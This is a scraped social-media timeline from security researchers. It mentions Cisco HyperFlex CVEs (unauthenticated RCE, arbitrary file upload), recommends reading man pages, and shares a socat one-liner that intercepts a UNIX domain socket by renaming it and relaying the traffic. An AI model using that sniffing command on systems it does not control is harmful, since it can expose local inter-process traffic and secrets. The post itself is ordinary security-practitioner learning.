Attacker value is a little lower because I was able to test only the installer. # CVE-2021-1499 Arbitrary file upload (RCE implied) in the /upload endpoint. ##…

attackerkb.com

PT SWARM

@ptswarm

3 years

Cisco fixed two Unauth RCEs and an Arbitrary File Upload in HyperFlex HX Data Platform found by our researchers Nikita Abramov and Mikhail Klyuchnikov. CVE-2021-1497 CVE-2021-1498 CVE-2021-1499 Advisory:

1

47

109

0

16

43

wvu

@wvuuuuuuuuuuuuu

3 years

Seriously good advice. I read man pages on flights when I don't have internet access. You can learn so much from the manual. Read it, even if you don't "need" it.

3

6

41

wvu

@wvuuuuuuuuuuuuu

2 years

Other socat examples from the man page.

Ron Bowes

@iagox86

2 years

TIL how to "sniff" a UNIX domain socket: # mv /var/run/sock /var/run/sock.original # socat -t100 -x -v UNIX-LISTEN:/var/run/sock,mode=777,reuseaddr,fork UNIX-CONNECT:/var/run/sock.original (This might mess up the thing using the socket though :) )

1

26

117

3

10

41